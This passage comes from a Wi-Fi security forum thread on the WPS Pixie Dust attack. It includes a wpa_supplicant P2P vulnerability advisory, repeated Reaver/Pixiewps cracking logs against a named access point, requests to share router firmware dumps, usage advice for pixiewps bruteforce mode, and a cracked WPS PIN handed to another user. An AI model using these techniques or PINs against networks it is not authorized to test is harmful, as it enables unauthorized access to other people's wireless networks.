    due to wpa_supplicant process crash, exposure of memory contents during
    GO Negotiation, and potentially arbitrary code execution.
    
    Vulnerable versions/configurations
    
    wpa_supplicant v1.0-v2.4 with CONFIG_P2P build option enabled
    
    Attacker (or a system controlled by the attacker) needs to be within
    radio range of the vulnerable system to send a suitably constructed
    management frame that triggers a P2P peer device information to be
    created or updated.
    
    The vulnerability is easiest to exploit while the device has started an
    active P2P operation (e.g., has ongoing P2P_FIND or P2P_LISTEN control
    interface command in progress). However, it may be possible, though
    significantly more difficult, to trigger this even without any active
    P2P operation in progress.
    
    
    Acknowledgments
    
    Thanks to Google security team for reporting this issue and smart
    hardware research group of Alibaba security team for discovering it.
    
    
    Possible mitigation steps
    
    - Merge the following commits to wpa_supplicant and rebuild it:
    
      P2P: Validate SSID element length before copying it (CVE-2015-1863)
    
      This patch is available from http://w1.fi/security/2015-1/
    
    - Update to wpa_supplicant v2.5 or newer, once available
    
    - Disable P2P (control interface command "P2P_SET disabled 1" or
      "p2p_disabled=1" in (each, if multiple interfaces used) wpa_supplicant
      configuration file)
    
    - Disable P2P from the build (remove CONFIG_P2P=y)
    That text is not mine, it comes verbatim from the link I posted above. I take no credit and do not mean to infringe any copyrights or screw with any legal stuff that I don't know about.

    Anyways, I guess SSID information comes from Management frames, which are unencrypted packets.... check it out here: http://www.wi-fiplanet.com/tutorials...le.php/1447501 They can't be encrypted because they "establish and maintain connections" (quoted form wi-fi planet) making it a whole lot easier for attackers. There is no encryption to break so it should be a fairly straightforward process

    If you are worried about this, I suggest you get an AP that supports 802.11w. Read about it here: http://www.cisco.com/c/en/us/td/docs...apter_0100.pdf

    Let me know what you think about this!
    Last edited by soxrok2212; 2015-04-30 at 00:40.

  20. #320
    Join Date
    2015-Mar
    Posts
    141
    Where can i get a copy of this firmware everyone is picking apart right now? I've tried to find some arris firmwares(as some seem to be invulerable to pixie) but they are apparently very tightly guarded and i do not own one or i would dump it myself. Definently no downloads for them, but if i get my hands on one physically... different story :-D
    email username @ gmail

  21. #321
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by aanarchyy View Post
    Where can i get a copy of this firmware everyone is picking apart right now? I've tried to find some arris firmwares(as some seem to be invulerable to pixie) but they are apparently very tightly guarded and i do not own one or i would dump it myself. Definently no downloads for them, but if i get my hands on one physically... different story :-D
    email username @ gmail
    http://sourceforge.net/projects/alfa...iles/Firmware/

    Alfa AIP-W525H I believe.... not sure if it is v1 or v2 though.

  22. #322
    Join Date
    2015-Mar
    Posts
    127
    Manufacturer: Greenwave
    Device Name: GreenWave BHR4
    Model Number: 4

    000000000:6F4| 1|-61|1.0|No |FiO00000000| GreenWave| 4|


    Greenwave Systems, no wikidevi, fccid

    NOT Vulnerable
    Last edited by nuroo; 2015-04-30 at 15:47.

  23. #323
    Join Date
    2015-Apr
    Posts
    5
    not work on technicolor TD5130 V1 and THOMSON AP

  24. #324
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Worked fine for me when I tested. You need to wait for the whole realtek tool to be released. It is almost done.

  25. #325
    Join Date
    2015-Mar
    Posts
    127
    Big Teaser !

  26. #326
    Join Date
    2015-Apr
    Posts
    5
    soxrok2212 i have tried many time on my network but no result

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from 18:17:25:xx:xx:xx
    [+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 5e:86:d7:2d:5a:11:c1:36:51:97:d7:16:54:c3:de:7f
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Name: Technicolor TD5
    [P] WPS Model Number: Technicolor TD5
    [P] Access Point Serial Number: 1343A1D22901
    [+] Received M1 message
    [P] R-Nonce: c0:68:f8:86:c5:14:c2:aa:d8:5f:56:29:51:0c:fd:d4
    [P] PKR: 58:f7:89:a6:11:fc:9e:ad:b1:a5:e5:e8:97:5b:4c:e3:f9 :a2:3c:d0:81:70:cf:4f:59:fd:bd:d1:7f:fe:fc:a0:28:6 4:46:fc:da:31:61:88:65:09:86:66:4b:9f:37:af:68:3b: 9e:1f:fd:bd:aa:09:f6:5b:b2:8d:da:e2:cf:cd:c5:5b:8c :87:82:e8:d4:8f:b8:9c:22:8e:ca:c2:ad:c3:43:01:4e:d 9:39:0b:ec:a9:12:bd:ba:02:a9:69:30:de:61:6d:da:cd: 47:80:9c:d9:39:4d:e3:40:c4:38:13:6d:15:f2:b1:68:9e :e4:45:0b:e9:0b:ba:bb:2e:7b:96:d4:c6:c2:8e:e6:07:8 c:fe:35:6d:7a:fd:8c:ca:24:d7:87:b7:b5:fd:8d:32:e7: e6:fa:5d:01:eb:d6:8a:aa:16:89:7a:63:ec:db:e1:60:01 :0f:0b:92:90:ba:e0:33:35:57:f5:01:63:36:0e:b1:46:6 a:70:99:cf:5c:49:6e:40:3c
    [P] AuthKey: f4:8d:63:52:60:ad:82:9e:7e:72:b4:84:82:bb:df:5d:0d :29:76:55:a4:07:57:9f:5a:92:07:17:19:53:42:ac
    [+] Sending M2 message
    [P] E-Hash1: 99:9f:06:06:d4:39:af:ba:43:40:bc:f3:42:db:04:64:e5 :cf:b3:ed:a7:f6:40:a9:f0:d0:eb:df:5c:91:67:79
    [P] E-Hash2: 9c:94:a1:72:b8:36:02:47:cd:50:44:d2:2f:fe:49:d8:68 :62:b7:de:84:ac:4a:a8:9e:75:a2:24:bf:37:ba:91
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 1 s
    [Pixie-Dust]

  27. #327
    Join Date
    2015-Apr
    Posts
    5
    soxrok2212 i have tried many time on my network but no result

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from 18:17:25:xx:xx:xx
    [+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 5e:86:d7:2d:5a:11:c1:36:51:97:d7:16:54:c3:de:7f
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Name: Technicolor TD5
    [P] WPS Model Number: Technicolor TD5
    [P] Access Point Serial Number: 1343A1D22901
    [+] Received M1 message
    [P] R-Nonce: c0:68:f8:86:c5:14:c2:aa:d8:5f:56:29:51:0c:fd:d4
    [P] PKR: 58:f7:89:a6:11:fc:9e:ad:b1:a5:e5:e8:97:5b:4c:e3:f9 :a2:3c:d0:81:70:cf:4f:59:fd:bd:d1:7f:fe:fc:a0:28:6 4:46:fc:da:31:61:88:65:09:86:66:4b:9f:37:af:68:3b: 9e:1f:fd:bd:aa:09:f6:5b:b2:8d:da:e2:cf:cd:c5:5b:8c :87:82:e8:d4:8f:b8:9c:22:8e:ca:c2:ad:c3:43:01:4e:d 9:39:0b:ec:a9:12:bd:ba:02:a9:69:30:de:61:6d:da:cd: 47:80:9c:d9:39:4d:e3:40:c4:38:13:6d:15:f2:b1:68:9e :e4:45:0b:e9:0b:ba:bb:2e:7b:96:d4:c6:c2:8e:e6:07:8 c:fe:35:6d:7a:fd:8c:ca:24:d7:87:b7:b5:fd:8d:32:e7: e6:fa:5d:01:eb:d6:8a:aa:16:89:7a:63:ec:db:e1:60:01 :0f:0b:92:90:ba:e0:33:35:57:f5:01:63:36:0e:b1:46:6 a:70:99:cf:5c:49:6e:40:3c
    [P] AuthKey: f4:8d:63:52:60:ad:82:9e:7e:72:b4:84:82:bb:df:5d:0d :29:76:55:a4:07:57:9f:5a:92:07:17:19:53:42:ac
    [+] Sending M2 message
    [P] E-Hash1: 99:9f:06:06:d4:39:af:ba:43:40:bc:f3:42:db:04:64:e5 :cf:b3:ed:a7:f6:40:a9:f0:d0:eb:df:5c:91:67:79
    [P] E-Hash2: 9c:94:a1:72:b8:36:02:47:cd:50:44:d2:2f:fe:49:d8:68 :62:b7:de:84:ac:4a:a8:9e:75:a2:24:bf:37:ba:91
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 1 s
    [Pixie-Dust]

  28. #328
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Try this PIN and let me know if it works: 76734052
    I really hope this is your own AP... by using that PIN you agree that I am not responsible for any trouble you may get into.

  29. #329
    Join Date
    2015-Mar
    Posts
    54
    @aboulatif
    Hey just a curiosity of mine... Is the WAN MAC of that router 18:17:25:2C:0B:75?

  30. #330
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    he forgot to blank out a line, so no wiire.


    "[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)"
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  31. #331
    Join Date
    2015-Apr
    Posts
    28
    Model name = model number ...

    Example..

    RTL8187 >>>> RTL ( Model name) 8187 ( Model number) ...

    Other values about modem manufacturer, not wps manufacturer ( 1.0.1.1 , 1 , 1234 )



    Old version or invulnerable chipsets are different. They should be well analyzed on Wireshark
    Last edited by Saydamination; 2015-04-30 at 22:31. Reason: Ok.

  32. #332
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by nuroo View Post
    Manufacturer: Greenwave
    Device Name: GreenWave BHR4
    Model Number: 4

    000000000:6F4| 1|-61|1.0|No |FiO00000000| GreenWave| 4|


    Greenwave Systems, no wikidevi, fccid

    NOT Vulnerable
    Send me the cap I'd like to look into it.

  33. #333
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by Quest View Post
    he forgot to blank out a line, so no wiire.


    "[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)"
    That's the WLAN MAC.

    I was asking for the WAN MAC = 18:17:25:2C:0B:7A - 5 = 18:17:25:2C:0B:75

  34. #334
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by Saydamination View Post
    Model name = model number ...

    Example..

    RTL8187 >>>> RTL ( Model name) 8187 ( Model number) ...

    Other values about modem manufacturer, not wps manufacturer ( 1.0.1.1 , 1 , 1234 )



    Old version or invulnerable chipsets are different. They should be well analyzed on Wireshark
    You shouldn't look too much into this. Manufacturers put what they want in those fields. Sometimes they put the valid model number, name, serial or whatever, sometimes they put something else, for example '123456' (or '1234' or whatever) which is like a blank field (I guess they can't put zeroes).

    Reaver prints those information only to give you a (sometimes vague) idea of what the chpset brand/model could be. The cracking is performed by pixiewps which don't use this information.

  35. #335
    Join Date
    2015-Mar
    Posts
    141
    @soxrok2212 here is a cap of the same router type, if you can get me a pin and/or tell me how that would rok ;-)


    http://d-h.st/9dE1
    Last edited by aanarchyy; 2015-05-01 at 16:35.

  36. #336
    Join Date
    2015-Mar
    Posts
    54
    Pixiewps 1.1 is out!

    See the original thread.

  37. #337
    Join Date
    2014-Oct
    Posts
    42
    Hey guys, I am a little bit confused as to the usage of -f in the new pixiewps. It refers to mode4??? anyone kind enough to clarify?

  38. #338
    Join Date
    2015-Apr
    Posts
    9
    just add -f 4

  39. #339
    Join Date
    2014-Oct
    Posts
    42
    And would you add this argument always?

  40. #340
    Join Date
    2015-Apr
    Posts
    9
    At first i tried it without that option on a router with Realtek chipset and it didn't found the pin then i tried it with -f 4 and it took about 600s then BOOM pin found

  41. #341
    Join Date
    2015-Mar
    Posts
    54
    QUOTE=psicomantis;44829]Hey guys, I am a little bit confused as to the usage of -f in the new pixiewps. It refers to mode4??? anyone kind enough to clarify?[/QUOTE]

    Yes sorry I should've clarified. The --force option is used only for what I call mode 4 which is Realtek 's PRNG seed bruteforce. I was planning on adding modes selection but I didn't and I left those modes on the usage screen and I didn't want to explicitly refer to vendors in the program.

    The best practice is to run the program without -f and if you get a warning saying that the router might be vulnerable to mode 4 it means that you may want to try again with -f or with another set of data that could lead you (mode 2) secret nonces = enrollee nonce. I also refer to modes because that's how the program runs internally: it tries for every possible vulnerability. When it bruteforce the new PRNG though (that is mode 4) it tests normally for a small window of time (approximately 10 days) because the new bruteforce is more consuming power.

    So --force is basically used only if the router has set its time to past (more than 10 days ago). To exhaust it probably takes 20 - 30 mins. Also -f doesn't take any argument. The program just doesn't complain if you pass it some extra arguments. I gotta fix that.

    Also would you mind replying on the pixiewps thread for program related questions? Thanks.

  42. #342
    Join Date
    2015-May
    Posts
    1
    hi wire can u tell me wich command should i use again realtek chipset?

  43. #343
    Join Date
    2013-Sep
    Posts
    264
    Hello hanada and welcome to the forum
    mmm... ┬┐Did you read the line just before your message?
    Quote Originally Posted by wiire
    Also would you mind replying on the pixiewps thread for program related questions? Thanks.
    Maybe you are not used to forums but you have to locate your question in the correct thread.
    Your question is strictly about pixiewps usage and this thread is about the pixie dust breach
    You should have asked your question in this thread
    By the way...
    ..., if you read a little you will find the answer to your question... read before asking, like this the forum is not full of duplicated content

  44. #344
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    @nuroo @aanarchyy I looked for more info the the data you sent me (caps and reaver output). Upon looking at the beacon frames in the cap that aanarchyy sent me, I see that the Greenwave G1100 uses a Broadcom 802.11N/AC chip, more specifically I believe that it may be the BCM4360: https://wikidevi.com/wiki/Broadcom... AFAIK the G1100 is 3x3:3 on 2.4GHz and 3x3:3 on 5GHz. Assuming so, that leads me to the conclusion above. With the lack of documentation, the only way to find out for sure would be to order one and open it up but FiOS is not available in my area and I don't have $200-$300 to spend on it... I don't even see their firmware available anywhere online...

  45. #345
    Join Date
    2015-Mar
    Posts
    141
    If i can get my hands on one, i will gladly dump it and share. As of recently, I've been poking around a dump i did the other day of a Belkin F9K1001 v1 ( https://wikidevi.com/wiki/Belkin_F9K1001_v1 ) to see what i can find. Found it at the swap shed of the dump in my town so i had no issues pulling the flash chip off and dumping it. I pick up all kinds of random embeded devices to tinker with. Ive got somewhere over a dozen or so assorted routers/repeaters (Old comcast, old verizon, belkin, dlink, buffalo, netgear, linksys, and some random weird ones) i'd be glad to dump/decompress/decompile/share if anyone would find it usefull :-) I'm kinda sucky at reading assembly but I'm learning...

  46. #346
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Any Comcast /Cisco DPC3939?

  47. #347
    Join Date
    2015-Mar
    Posts
    127
    @soxrok2212
    gave u full dump, no filters. beacons should be in the .cap
    No Fios at my location also. Least you where able to deduce its a broadcom chip, never heard of greenwave b4 this. Was gonna be impressed if new company came out of the wood work, with new chipset all own their own.

    @aanarchy
    I will try to find out if G1100 can be updated, if firmware is available.

  48. #348
    Join Date
    2015-Mar
    Posts
    141
    Not sure, I'll check as soon as i get home. I think the onlyl two comcast ones i have are the old actiontec ones, not sure the chipsets but i'll look.

  49. #349
    Join Date
    2015-Mar
    Posts
    127
    G1100 firmware is not available for public download.

    As per the folks @ dslreports, who have the router - new firmware is made available to customers internally thru their network.

  50. #350
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by nuroo View Post
    @soxrok2212
    gave u full dump, no filters. beacons should be in the .cap
    No Fios at my location also. Least you where able to deduce its a broadcom chip, never heard of greenwave b4 this. Was gonna be impressed if new company came out of the wood work, with new chipset all own their own.

    @aanarchy
    I will try to find out if G1100 can be updated, if firmware is available.
    Hey, the cap I got from you only has the WPS exchange in it, I didn't see any beacons...
    Last edited by soxrok2212; 2015-05-04 at 21:30.

Similar Threads

  1. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  2. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32
  3. Implement new WPS Pixie Dust Attack into Reaver
    By six in forum General Archive
    Replies: 24
    Last Post: 2015-01-28, 20:31

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •